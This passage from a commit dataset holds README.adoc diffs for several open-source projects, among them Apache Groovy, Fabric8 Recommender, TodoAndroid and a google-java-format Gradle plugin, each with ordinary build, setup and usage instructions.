lopez.ivan@gmail.com (https:\/\/twitter.com\/ilopmar[@ilopmar])\n\nCollaborations are appreciated :-)\n\n\n== Release Notes\n\n* 0.2.1 - 18\/Jan\/2015 - Fix regresion in 0.2 (See https:\/\/github.com\/lmivan\/grails-url-shortener\/issues\/6[#6])\n* 0.2 - 21\/Nov\/2014 - Added GSP tags `shorter:link` and `shorter:createLink`.\n* 0.1 - 17\/Oct\/2013 - Initial version of the plugin.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12591cde3c14f174a8fad527b1ebcd150f503e1f","subject":"Update","message":"Update\n","repos":"IanDarwin\/TodoAndroid,IanDarwin\/TodoAndroid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= TodoAndroid\n\nThis will someday be the TodoMore Android client.\n\n== Unfinished Warning\n\nAs of today it certainly is not fully working - don't try to use it unless you can code the parts that are missing.\nThe next big push is the SyncAdapter: it starts but isn't fully coded yet, so don't run it against\na database of real TODOs.\n\nNext up in this area will be a delete feature; it's harder because you have to atomically commit in two\nplaces, and you can't.\n\n== Security Warning\n\nThis version caches your password, unencrypted, in the shared preferences.\nSomebody who finds your phone AND knows what they're doing could modify\nor corrupt your TODO listings.\n\nPlease fix this and send a pull request!\n","old_contents":"= TodoAndroid\n\nThis will someday be the TodoMore Android client.\nAs of today it certainly is not fully working - don't try to use it unless you can recode the parts that are missing.\n\n== Security Warning\n\nThis version caches your password, unencrypted, in the shared preferences.\nSomebody who finds your phone AND knows what they're doing could modify\nor corrupt your TODO listings.\n\nPlease fix this and send a pull request!\n","returncode":0,"stderr":"","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ea6e82514dea770205ad87353581110eaf298308","subject":"fix(readme): change readme to trigger a release","message":"fix(readme): change readme to trigger a release\n","repos":"arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Fabric8 Recommender\n\nimage:https:\/\/img.shields.io\/badge\/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic%20release-b4d455.svg[Semantic Release, link=\"https:\/\/github.com\/semantic-release\/semantic-release\"]\n\n**Fabric8 Recommender is a stack analysis feature.**\n\n== Running the app\n\n=== Set NODE_ENV\nIf you're just trying to test the application, please use inmemory mode which\nwill load the app with mock data for you. If you, however, want to contribute\nto the codebase, unset it or set it back to \"development\" (default) mode and rebuild.\n\n\n[source,shell]\n```\n$ export NODE_ENV=inmemory # <1>\n$ export NODE_ENV=development # <2>\n$ export NODE_ENV=production # <3>\n```\n\n<1> In-memory mode for trying out the app\n<2> Development mode for contributing to the source\n<3> Production mode for deploying the application\n\nOnce you're done setting the environment, you can proceed with the next step(s).\n\nNOTE: If you're directly trying to run the app in dev mode, you can skip this\nstep, as *`NODE_ENV`* is treated as `\"development\"` by default.\n\n=== First run\n\nIf you're trying to run the app for the first time:\n\n $ npm install\n\nThen, start the app with:\n\n $ npm start\n\n=== Fresh run\n\nIf you're trying to refresh your installation, you need to run:\n\n $ npm run reinstall\n\nThen, start the app with:\n\n $ npm start\n\n=== Testcase run\n\nTo run the linter, unit tests, and functional tests, use:\n\n $ npm test\n\n== Other useful scripts\n\nThe *`package.json`* file's `scripts:` section lists _all the tasks_ we run.\n\nHere are some of the most useful\/frequently used scripts you may need to run:\n\n[cols=\"1,2,4\", options=\"header\"]\n|===\n|Script\n|Command\n|Description\n\n|Lint\n|`$ npm run lint`\n|Runs the TypeScript and Angular 2 linter\n\n|Validation\n|`$ npm run validate`\n|Validates the webpack build\n\n|Unit Tests\n|`$ npm run test:unit`\n|Runs the unit tests\n\n|Functional Tests\n|`$ npm run test:func`\n|Runs the functional tests\n\n|Continuous Tests\n|`$ npm run watch:test`\n|Looks for changes in source code and runs unit tests\n|===\n
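\nFor example, during development it can be handy to leave the continuous test task from the table above running while you edit:\n\n----\n$ npm run watch:test\n----\n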
\n== Building the app\n\n=== Production build\n\nTo generate a production build, set the API URL and run the build script as follows:\n\n----\n$ npm run build:prod\n----\n\nThe build output will be under the `dist` directory.\n\n*To create a docker image,* run this command immediately after the production\nbuild completion:\n\n=== Library Build\n\n==== For production:\n\nTo build the fabric8-stack-analysis-ui as an npm library, use:\n\n----\n$ npm run build\n----\n\nThe created library will be placed in `dist`.\n\nIMPORTANT: *You shouldn't ever publish the build manually;* instead, you should\nlet the CD pipeline do a semantic release.\n\n==== For development:\n\nTo build fabric8-stack-analysis-ui as an npm library and embed it into a webapp such as\nfabric8-ui, you should:\n\nStep 1: Run `npm run watch:library` in the source directory::\nThis will build fabric8-stack-analysis-ui as a library and then set up a watch task to\nrebuild any ts, html and scss files you change.\n\nStep 2: Run `npm link <path to fabric8-stack-analysis-ui>\/dist-watch`::\nIn the webapp into which you are embedding. 
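For example, with the library cloned at `~\/work\/fabric8-stack-analysis-ui` and your webapp in `my-webapp` (both paths purely illustrative), the commands would be:\n+\n----\n$ cd my-webapp\n$ npm link ~\/work\/fabric8-stack-analysis-ui\/dist-watch\n----\n+\n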
This will create a symlink from\n`node_modules\/fabric8-stack-analysis-ui` to the `dist-watch` directory and install that\nsymlinked node module into your webapp.\n\nStep 3: Run your webapp in development mode::\nMake sure you have a watch on `node_modules\/fabric8-stack-analysis-ui` enabled. You will\nhave access to both JS and SASS sourcemaps if your webapp is properly set up.\n\nNOTE: `fabric8-ui` is set up to do reloading and sourcemaps automatically when you\nrun `npm start`.\n\n**To hit the stack analysis api in standalone mode**\nPut a token in the environment variable with the key 'STACK_API_TOKEN'.\n\n== CSS and SASS\n\nfabric8-stack-analysis-ui uses SASS for its stylesheets. It also uses the Angular emulation\nof the shadow dom, so you will normally want to place your styles in the\n`.component.scss` file next to the html and the typescript.\n\nWe use mixins to avoid polluting components with unnecessary style classes, and to avoid\nan explosion of shared files. \n\nThe `src\/assets\/stylesheets\/` directory includes a `shared` directory. These are\nshared global styles that we will refactor out into a shared library at some point.\nOnly update these styles if you are making a truly global style, and are going to\nsynchronise your changes across all the various UI projects. \n\n== Contributing to the app\n\nThe development guide is part of the link:.\/CONTRIBUTING.adoc[contributors'\ninstructions]. Please check it out in order to contribute to this project. \n","old_contents":"= Fabric8 Recommender\n\nimage:https:\/\/img.shields.io\/badge\/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic%20release-b4d455.svg[Semantic Release, link=\"https:\/\/github.com\/semantic-release\/semantic-release\"]\n\n**Fabric8 Recommender is a stack analysis feature.**\n\n== Running the app\n\n=== Set NODE_ENV\nIf you're just trying to test the application, please use inmemory mode which\nwill load the app with mock data for you. 
If you, however, want to contribute\nto the codebase, unset it back or to \"development\" (default) mode and rebuild.\n\n\n[source,shell]\n```\n$ export NODE_ENV=inmemory # <1>\n$ export NODE_ENV=development # <2>\n$ export NODE_ENV=production # <3>\n\n<1> In-memory mode for trying-out the app\n<2> Development mode for contributing to the source\n<2> Production mode for deploying the application\n```\n\nOnce you're done setting the environment, you can proceed with the next step(s)\n\nNOTE: If you're directly trying to run the app in dev mode, you can skip this\nstep, as *`NODE_ENV`* is treated as `\"development\"` by default.\n\n=== First run\n\nIf you're trying to run the app for the first time:\n\n $ npm install\n\nThen, start the app with:\n\n $ npm start\n\n=== Fresh run\n\nIf you trying to refresh your installation, you need to run:\n\n $ npm run reinstall\n\nThen, start the app with:\n\n $ npm start\n\n=== Testcase run\n\nTo run the linter, unit tests, and functional test use:\n\n $ npm test\n\n== Other useful scripts\n\nThe *`package.json`* file's `scripts:` section lists _all the tasks_ we run.\n\nHere are some of the most useful\/frequently used scripts you may need to run:\n\n[cols=\"1,2,4\", options=\"header\"]\n|===\n|Scipt\n|Command\n|Description\n\n|Lint\n|`$ npm run lint`\n|Runs the TypeScript and Angular 2 linter\n\n|Validation\n|`$ npm run validate`\n|Validates the webpack build\n\n|Unit Tests\n|`$ npm run test:unit`\n|Runs the unit tests\n\n|Functional Tests\n|`$ npm run test:func`\n|Runs the functional tests\n\n|Continuous Tests\n|`$ npm run watch:test`\n|Looks for changes in source code and runs unit tests\n|===\n\n== Building the app\n\n=== Production build\n\nTo generate production build, set API URL and run build script as follows:\n\n----\n$ npm run build:prod\n----\n\nThe build output will be under `dist` directory.\n\n*To create a docker image,* run this command immediately after the production\nbuild completion:\n\n=== Library Build\n\n==== For production:\n\nTo build the fabric8-stack-analysis-ui as an npm library, use:\n\n----\n$ npm run build\n----\n\nThe created library will be placed in `dist`.\n\nIMPORTANT: *You shouldn't ever publish the build manually,* instead you should\nlet the CD pipeline do a semantic release.\n\n==== For development:\n\nTo build fabric8-stack-analysis-ui as an npm library and embed it into a webapp such as\nfabric8-ui, you should:\n\nStep 1: Run `npm run watch:library` in the source directory::\nThis will build fabric8-stack-analysis-ui as a library and then set up a watch task to\nrebuild any ts, html and scss files you change.\n\nStep 2: Run `npm link <path to fabric8-stack-analysis-ui>\/dist-watch`::\nIn the webapp into which you are embedding. This will create a symlink from\n`node_modules\/fabric8-stack-analysis-ui` to the `dist-watch` directory and install that\nsymlinked node module into your webapp.\n\nStep 3: Run your webapp in development mode::\nMake sure you have a watch on `node_modules\/fabric8-stack-analysis-ui` enabled. You will\nhave access to both JS and SASS sourcemaps if your webapp is properly setup.\n\nNOTE: `fabric8-ui` is setup to do reloading and sourcemaps automatically when you\nrun `npm start`.\n\n**To hit stack analysis api in standalone mode**\nPut a token in the environment variable with key as 'STACK_API_TOKEN'\n\n== CSS and SASS\n\nfabric8-stack-analysis-ui uses SASS for it's stylesheets. 
It also uses the Angular emulation\nof the shadow dom, so you will normally want to place your styles in the\n`.component.scss` file next to the html and the typescript.\n\nWe use mixins to avoid polluting components with uncessary style classes, and to avoid\nan explosion of shared files. \n\nThe `src\/assets\/stylesheets\/` directory includes a `shared` directory. These are\nshared global styles that we will refactor out in to a shared library at some point.\nOnly update these styles if you are making a truly global style, and are going to\nsynchronise your changes across all the various UI projects. \n\n== Contributing to the app\n\nThe development guide is part of the link:.\/CONTRIBUTING.adoc[contributors'\ninstructions]. Please check it out in order to contribute to this project. \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7fbff13ef3c1c52348aff998f8568e15cc81e172","subject":"Fix IDE integration instructions in README. (closes #26)","message":"Fix IDE integration instructions in README. (closes #26)\n\nThe README stated that you should run\n\n gradlew jarAll idea\n\nbefore loading the project into IntelliJ IDEA. It seems, though, that the `jarAll`\ntask breaks the IDE integration and you can't run tests. Running\n\n gradlew jar idea\n\nseems to work fine, so I've updated the README to reflect this.\n","repos":"shils\/incubator-groovy,sagarsane\/incubator-groovy,apache\/groovy,pickypg\/incubator-groovy,upadhyayap\/incubator-groovy,antoaravinth\/incubator-groovy,paulk-asert\/incubator-groovy,avafanasiev\/groovy,genqiang\/incubator-groovy,alien11689\/incubator-groovy,pledbrook\/incubator-groovy,adjohnson916\/incubator-groovy,samanalysis\/incubator-groovy,nkhuyu\/incubator-groovy,dpolivaev\/groovy,jwagenleitner\/groovy,bsideup\/groovy-core,jwagenleitner\/groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,paplorinc\/incubator-groovy,nobeans\/incubator-groovy,yukangguo\/incubator-groovy,rabbitcount\/incubator-groovy,ChanJLee\/incubator-groovy,nkhuyu\/incubator-groovy,sagarsane\/incubator-groovy,aim-for-better\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/groovy,aim-for-better\/incubator-groovy,dpolivaev\/groovy,bsideup\/incubator-groovy,ChanJLee\/incubator-groovy,upadhyayap\/incubator-groovy,bsideup\/incubator-groovy,EPadronU\/incubator-groovy,taoguan\/incubator-groovy,fpavageau\/groovy,ebourg\/incubator-groovy,paplorinc\/incubator-groovy,tkruse\/incubator-groovy,upadhyayap\/incubator-groovy,taoguan\/incubator-groovy,aim-for-better\/incubator-groovy,aaronzirbes\/incubator-groovy,pledbrook\/incubator-groovy,paplorinc\/incubator-groovy,shils\/groovy,kidaa\/incubator-groovy,gillius\/incubator-groovy,jwagenleitner\/incubator-groovy,taoguan\/incubator-groovy,russel\/groovy,apache\/groovy,bsideup\/groovy-core,samanalysis\/incubator-groovy,dpolivaev\/groovy,adjohnson916\/incubator-groovy,alien11689\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,genqiang\/incubator-groovy,genqiang\/incubator-groovy,jwagenleitner\/incubator-groovy,graemerocher\/incubator-groovy,armsargis\/groovy,antoaravinth\/incubator-groovy,fpavageau\/groovy,apache\/groovy,pickypg\/incubator-groovy,antoaravinth\/incubator-groovy,gillius\/incubator-groovy,eginez\/incubator-groovy,graemerocher\/incubator-groovy,EPadronU\/incubator-groovy,shils\/incubator-groovy,kenzanmedia\/incubator-groovy,samanalysis\/incubator-groovy,samanalysis\/incubator-groovy,kenzanmedia\/incubator-groovy,nobeans\/incubator-groovy,ChanJLee\/incubator
-groovy,guangying945\/incubator-groovy,russel\/groovy,i55ac\/incubator-groovy,rabbitcount\/incubator-groovy,guangying945\/incubator-groovy,shils\/groovy,paplorinc\/incubator-groovy,traneHead\/groovy-core,taoguan\/incubator-groovy,rabbitcount\/incubator-groovy,pledbrook\/incubator-groovy,pickypg\/incubator-groovy,sagarsane\/incubator-groovy,russel\/incubator-groovy,apache\/incubator-groovy,tkruse\/incubator-groovy,graemerocher\/incubator-groovy,i55ac\/incubator-groovy,bsideup\/groovy-core,apache\/incubator-groovy,apache\/incubator-groovy,shils\/incubator-groovy,paulk-asert\/groovy,sagarsane\/incubator-groovy,tkruse\/incubator-groovy,pickypg\/incubator-groovy,adjohnson916\/incubator-groovy,alien11689\/incubator-groovy,paulk-asert\/groovy,russel\/incubator-groovy,russel\/groovy,russel\/groovy,dpolivaev\/groovy,avafanasiev\/groovy,jwagenleitner\/groovy,antoaravinth\/incubator-groovy,tkruse\/incubator-groovy,pledbrook\/incubator-groovy,ebourg\/incubator-groovy,graemerocher\/incubator-groovy,alien11689\/incubator-groovy,ebourg\/incubator-groovy,kidaa\/incubator-groovy,gillius\/incubator-groovy,nobeans\/incubator-groovy,armsargis\/groovy,shils\/groovy,aim-for-better\/incubator-groovy,armsargis\/groovy,bsideup\/incubator-groovy,yukangguo\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/incubator-groovy,fpavageau\/groovy,i55ac\/incubator-groovy,kenzanmedia\/incubator-groovy,paulk-asert\/incubator-groovy,russel\/incubator-groovy,eginez\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,yukangguo\/incubator-groovy,apache\/groovy,ChanJLee\/incubator-groovy,paulk-asert\/incubator-groovy,avafanasiev\/groovy,kidaa\/incubator-groovy,paulk-asert\/groovy,kidaa\/incubator-groovy,fpavageau\/groovy,bsideup\/groovy-core,rabbitcount\/incubator-groovy,shils\/incubator-groovy,gillius\/incubator-groovy,paulk-asert\/groovy,paulk-asert\/incubator-groovy,russel\/incubator-groovy,shils\/groovy,bsideup\/incubator-groovy,adjohnson916\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,nkhuyu\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,guangying945\/incubator-groovy,nobeans\/incubator-groovy,yukangguo\/incubator-groovy,guangying945\/incubator-groovy,avafanasiev\/groovy,kenzanmedia\/incubator-groovy,nkhuyu\/incubator-groovy,ebourg\/incubator-groovy,genqiang\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/incubator-groovy,upadhyayap\/incubator-groovy","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Groovy\nThe Groovy development team\n:revdate: 24-02-2014\n:build-icon: http:\/\/ci.groovy-lang.org:8111\/app\/rest\/builds\/buildType:(id:Groovy_Jdk7Build)\/statusIcon\n:noheader:\n:groovy-www: http:\/\/groovy-lang.org\/\n:groovy-ci: http:\/\/ci.groovy-lang.org?guest=1\n:jdk: http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\n:bintray-latest-version-image: https:\/\/api.bintray.com\/packages\/groovy\/maven\/groovy\/images\/download.png\n:bintray-latest-version-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/_latestVersion\n:bintray-watch-image: https:\/\/www.bintray.com\/docs\/images\/bintray_badge_color.png\n:bintray-watch-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/view?source=watch\n\n[.left.text-left]\nimage::http:\/\/groovy.codehaus.org\/img\/groovy-logo.png[]\n{groovy-www}[Groovy] is a powerful, optionally typed and dynamic language, with static-typing and static compilation capabilities, for the Java platform aimed at multiplying developers\u2019 productivity thanks to a concise, familiar and easy to 
learn syntax.\n\nIt integrates smoothly with any Java program, and immediately delivers to your application powerful features, including scripting capabilities, Domain-Specific Language authoring, runtime and compile-time meta-programming and functional programming. \n\n== Downloading\n\nLatest Groovy version is available on Bintray image:{bintray-latest-version-image}[Bintray latest version, link={bintray-latest-version-link}]\n\nBinary distribution links are on the package page.\n\nMaven, Gradle and Ivy dependency declaration snippets are available on specific files of a particular module.\n\nimage:{bintray-watch-image}[Get automatic notifications about new \"groovy\" versions, link={bintray-watch-link}]\n\n== Obtaining the Source\n\nYou don't need the source code to use Groovy but if you wish to explore its inner workings or build it for yourself there are two ways to obtain the source files.\n\n=== Checking out from Version Control\n\nApache Groovy uses Git. The official Git repository is at:\n\n http:\/\/git-wip-us.apache.org\/repos\/asf\/incubator-groovy.git\n\nAnd a mirror is hosted on Github:\n\n https:\/\/github.com\/apache\/incubator-groovy\n\nThe Github mirror is read-only and provides convenience to users and developers to explore the code and for the community to accept contributions via Github pull requests.\n\nSimply `git clone` the repo (or the repo you forked via the github website) and you will have the complete source.\n\n=== Unpacking the src distribution\n\nAlternatively, you can download the source distribution and unpack it.\n\nIf obtaining the source from this distribution and you intend to build from source,\nyou also need to https:\/\/gradle.org\/downloads\/[download] and install http:\/\/gradle.org\/[Gradle] and execute one bootstrap step.\nAt the top directory of your unpacked source, you need to run the command:\n\n gradle\n\nThis sets up the Gradle wrapper and from then on you just need the `gradlew` command instead of `gradle`.\n\n== Building from Source\n\nBuild is image:{build-icon}[build status, link={groovy-ci}].\n\nTo build you will need:\n\n* {jdk}[JDK 1.7+]\n\nTo build everything using Gradle:\n\n gradlew clean dist\n\nNote: The gradlew command automatically downloads the correct Gradle version if needed; you do not need to download it first.\n\nThis will generate a distribution similar to the zip you can download on the Groovy download page.\n\nTo build everything and launch unit tests, use:\n\n gradlew test\n\nIf you want to launch one unit test, use this. <TestClassName> is like `groovy.GroovyMethodsTest`.\n\n gradlew :test --tests <TestClassName>\n\nTo build from IntelliJ IDEA:\n\n gradlew jar idea\n\nThen open the generated project in IDEA.\n\nTo build from Eclipse:\n\n gradlew jar eclipse\n\nThen open the generated project and the generated subprojects in Eclipse. But be aware that Eclipse tends to be more limited in its ability to reproduce a Gradle build structure. The generated project files may contain a circular dependency which may or may not prevent Eclipse from using them. Whether this is an issue or not depends on the Eclipse version.\n\nTo build the documentation (Groovy Language Documentation):\n\n gradlew assembleAsciidoc\n\nAll code samples of the documentation guide are pulled from actual test cases. 
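For illustration, such a documentation-backed test is just an ordinary test class whose tagged snippets are extracted into the guide (a minimal hypothetical sketch, not one of the actual spec classes):\n\n[source, groovy]\n----\nclass PowerAssertExampleTest extends GroovyTestCase {\n void testPowerAssert() {\n \/\/ tag::power_assert[] - this marker delimits the snippet pulled into the docs\n def x = 9\n assert x % 3 == 0\n \/\/ end::power_assert[]\n }\n}\n----\n\n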
To run a single documentation test case, take for example `src\/spec\/test\/semantics\/PowerAssertTest.groovy`\n\n gradlew testSinglePowerAssertTest\n\n(Note the omission of package name: class is `semantics.PowerAssertTest` but only `PowerAssertTest` is added to `testSingle`.)\n\n== InvokeDynamic support\n\nThe Groovy build supports the new Java 7 JVM instruction `invokedynamic`. If you want to build Groovy with invokedynamic, you can use the project property `indy`:\n\n gradlew -Pindy=true clean test\n\nPlease note that the following Gradle tasks generate both indy and non indy variants of the jars, so you don't need to use the system property:\n\n* dist\n* install\n* uploadArchives\n\n== Continuous Integration Server\n\nThe official CI server runs {groovy-ci}[here] (login as user guest and leave the password blank) and is sponsored by http:\/\/www.jetbrains.com[JetBrains].\n\n== License\n\nGroovy is licensed under the terms of the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache License, Version 2.0]\n","old_contents":"= Groovy\nThe Groovy development team\n:revdate: 24-02-2014\n:build-icon: http:\/\/ci.groovy-lang.org:8111\/app\/rest\/builds\/buildType:(id:Groovy_Jdk7Build)\/statusIcon\n:noheader:\n:groovy-www: http:\/\/groovy-lang.org\/\n:groovy-ci: http:\/\/ci.groovy-lang.org?guest=1\n:jdk: http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\n:bintray-latest-version-image: https:\/\/api.bintray.com\/packages\/groovy\/maven\/groovy\/images\/download.png\n:bintray-latest-version-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/_latestVersion\n:bintray-watch-image: https:\/\/www.bintray.com\/docs\/images\/bintray_badge_color.png\n:bintray-watch-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/view?source=watch\n\n[.left.text-left]\nimage::http:\/\/groovy.codehaus.org\/img\/groovy-logo.png[]\n{groovy-www}[Groovy] is a powerful, optionally typed and dynamic language, with static-typing and static compilation capabilities, for the Java platform aimed at multiplying developers\u2019 productivity thanks to a concise, familiar and easy to learn syntax.\n\nIt integrates smoothly with any Java program, and immediately delivers to your application powerful features, including scripting capabilities, Domain-Specific Language authoring, runtime and compile-time meta-programming and functional programming. \n\n== Downloading\n\nLatest Groovy version is available on Bintray image:{bintray-latest-version-image}[Bintray latest version, link={bintray-latest-version-link}]\n\nBinary distribution links are on the package page.\n\nMaven, Gradle and Ivy dependency declaration snippets are available on specific files of a particular module.\n\nimage:{bintray-watch-image}[Get automatic notifications about new \"groovy\" versions link={bintray-watch-link}]\n\n== Obtaining the Source\n\nYou don't need the source code to use Groovy but if you wish to explore its inner workings or build it for yourself there are two ways to obtain the source files.\n\n=== Checking out from Version Control\n\nApache Groovy uses Git. 
The official Git repository is at:\n\n http:\/\/git-wip-us.apache.org\/repos\/asf\/incubator-groovy.git\n\nAnd a mirror is hosted on Github:\n\n https:\/\/github.com\/apache\/incubator-groovy\n\nThe Github mirror is read-only and provides convenience to users and developers to explore the code and for the community to accept contributions via Github pull requests.\n\nSimply `git clone` the repo (or the repo you forked via the github website) and you will have the complete source.\n\n=== Unpacking the src distribution\n\nAlternatively, you can download the source distribution and unpack it.\n\nIf obtaining the source from this distribution and you intend to build from source,\nyou also need to https:\/\/gradle.org\/downloads\/[download] and install http:\/\/gradle.org\/[Gradle] and execute one bootstrap step.\nAt the top directory of your unpacked source, you need to run the command:\n\n gradle\n\nThis sets up the Gradle wrapper and from then on you just need the `gradlew` command instead of `gradle`.\n\n== Building from Source\n\nBuild is image:{build-icon}[build status, link={groovy-ci}].\n\nTo build you will need:\n\n* {jdk}[JDK 1.7+]\n\nTo build everything using Gradle:\n\n gradlew clean dist\n\nNote: The gradlew command automatically downloads the correct Gradle version if needed, you do not need to download it first.\n\nThis will generate a distribution similar to the zip you can download on the Groovy download page.\n\nTo build everything and launch unit tests, use:\n\n gradlew test\n\nIf you want to launch one unit test, use this. <TestClassName> is like `groovy.GroovyMethodsTest`.\n\n gradlew :test --tests <TestClassName>\n\nTo build from IntelliJ IDEA:\n\n gradlew jarAll idea\n\nThen open the generated project in IDEA.\n\nTo build from Eclipse:\n\n gradlew jarAll eclipse\n\nThen open the generated project and the generated subprojects in Eclipse. But be aware that Eclipse tends to be more limited in its ability to reproduce a Gradle build structure. The generated project files may contain a circular dependency which may or may not prevent Eclipse from using them. It depends on the Eclipse version, if this is an issue or not.\n\nTo build the documentation (Groovy Language Documentation):\n\n gradlew assembleAsciidoc\n\nAll code samples of the documentation guide are pulled from actual test cases. To run a single documentation test case, take for example `src\/spec\/test\/semantics\/PowerAssertTest.groovy`\n\n gradlew testSinglePowerAssertTest\n\n(Note the omission of package name: class is `semantics.PowerAssertTest` but only `PowerAssertTest` is added to `testSingle`.)\n\n== InvokeDynamic support\n\nThe Groovy build supports the new Java 7 JVM instruction `invokedynamic`. 
If you want to build Groovy with invokedynamic, you can use the project property `indy`:\n\n gradlew -Pindy=true clean test\n\nPlease note that the following Gradle tasks generate both indy and non indy variants of the jars, so you don't need to use the system property:\n\n* dist\n* install\n* uploadArchives\n\n== Continuous Integration Server\n\nThe official CI server runs {groovy-ci}[here] (login as user guest and leave the password blank) and is sponsored by http:\/\/www.jetbrains.com[JetBrains].\n\n== License\n\nGroovy is licensed under the terms of the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache License, Version 2.0]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f441357d445ce94dcf88161d4b1465865370d98f","subject":"Update README for v0.3","message":"Update README for v0.3","repos":"sherter\/google-java-format-gradle-plugin,sherter\/google-java-format-gradle-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= google-java-format-gradle-plugin\n:release-version: 0.3\n:default-google-java-format-version: 1.0\n:snapshot-version: 0.4-SNAPSHOT\n\n\nA https:\/\/github.com\/gradle\/gradle[Gradle] plugin that utilizes\nhttps:\/\/github.com\/google\/google-java-format[google-java-format] to\nformat the Java source files in your Gradle project.\n\nimage:https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin.svg?branch=master[\"Build\nStatus\",\nlink=\"https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin\"]\n\n== Quick Start\n* Apply the plugin in your build script (follow https:\/\/plugins.gradle.org\/plugin\/com.github.sherter.google-java-format[these instructions]\nfor Gradle versions below `2.1`)\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\nplugins {\n id 'com.github.sherter.google-java-format' version '{release-version}'\n}\n----\n+\n\n* Make sure you have defined a repository that contains version `{default-google-java-format-version}` of `google-java-format`\n+\n[source,groovy]\n----\nrepositories {\n jcenter() \/\/ or mavenCentral()\n}\n----\n\n* Execute the task `googleJavaFormat` to format all `*.java` files in the project\n+\n[source,shell]\n----\n$ .\/gradlew goJF\n----\n+\n* Execute the task `verifyGoogleJavaFormat` to verify that all `*.java` files are formatted properly\n+\n[source,shell]\n----\n$ .\/gradlew verGJF\n----\n\n== Extended Usage\n* The plugin adds the extension `googleJavaFormat` to your project. Adjust the variable `toolVersion` to use a specific version of `google-java-format`. You can even define `SNAPSHOT` versions, but make sure that you have added a repository to the project that contains this version (e.g. `mavenLocal()`). For plugin version `{release-version}` this value defaults to `{default-google-java-format-version}`. On every new release the default value will be updated to the latest version of `google-java-format`.\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ngoogleJavaFormat {\n toolVersion '1.1-SNAPSHOT'\n}\n----\n\n* Choose between `'GOOGLE'` (default) and `'AOSP'` style by setting the style option (not supported in conjunction with `toolVersion` `v0.1-alpha`):\n+\n[source,groovy]\n----\ngoogleJavaFormat {\n options style: 'AOSP'\n}\n----\n\n* The predefined tasks `googleJavaFormat` and `verifyGoogleJavaFormat` by default process all `*.java` files found in the project or any subproject (except for files in a `buildDir`). 
They are of type `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/SourceTask.html[SourceTask]` and can be configured accordingly. For example, if you want to exclude specific files from a predefined task you can use https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[Ant-style exclude patterns].\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ntasks.googleJavaFormat {\n exclude '**\/*Template.java'\n exclude 'src\/test\/template_*'\n}\n----\n+\nYou can also overwrite the default inputs and use your own rules (see `https:\/\/docs.gradle.org\/current\/userguide\/working_with_files.html[Working With Files]`)\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ntasks.verifyGoogleJavaFormat {\n setSource fileTree('subprojects')\n include '**\/*.java'\n}\n----\n\n* Define your own format or verification tasks if you need more than the predefined ones. The task type `VerifyGoogleJavaFormat` also implements the interface `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/VerificationTask.html[VerificationTask]`.\n+\n[source,groovy]\n----\nimport com.github.sherter.googlejavaformatgradleplugin.GoogleJavaFormat\nimport com.github.sherter.googlejavaformatgradleplugin.VerifyGoogleJavaFormat\n\ntask format(type: GoogleJavaFormat) {\n source 'src\/main'\n source 'src\/test'\n include '**\/*.java'\n exclude '**\/*Template.java'\n}\n\ntask verifyFormatting(type: VerifyGoogleJavaFormat) {\n source 'src\/main'\n include '**\/*.java'\n ignoreFailures true\n}\n----\n
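\nWith these custom tasks defined, they are invoked like any other Gradle tasks (a usage sketch):\n\n[source,shell]\n----\n$ .\/gradlew format verifyFormatting\n----\n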
\n== Snapshots\nOn every push to the master branch https:\/\/travis-ci.org\/[Travis] runs\nthe tests and, if all tests pass, publishes the built artifact to\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/[Sonatype's\n`snapshots` repository]. Use the following build script snippet for\nthe current snapshot version:\n\n[source,groovy]\n[subs=\"attributes\"]\n----\nbuildscript {\n repositories {\n maven {\n url 'https:\/\/oss.sonatype.org\/content\/repositories\/snapshots\/'\n }\n }\n dependencies {\n classpath 'com.github.sherter.googlejavaformatgradleplugin:google-java-format-gradle-plugin:{snapshot-version}'\n }\n}\n\napply plugin: 'com.github.sherter.google-java-format'\n----\n","old_contents":"= google-java-format-gradle-plugin\n:release-version: 0.2\n:default-google-java-format-version: 0.1-alpha\n:snapshot-version: 0.3-SNAPSHOT\n\n\nA https:\/\/github.com\/gradle\/gradle[Gradle] plugin that utilizes\nhttps:\/\/github.com\/google\/google-java-format[google-java-format] to\nformat the Java source files in your Gradle 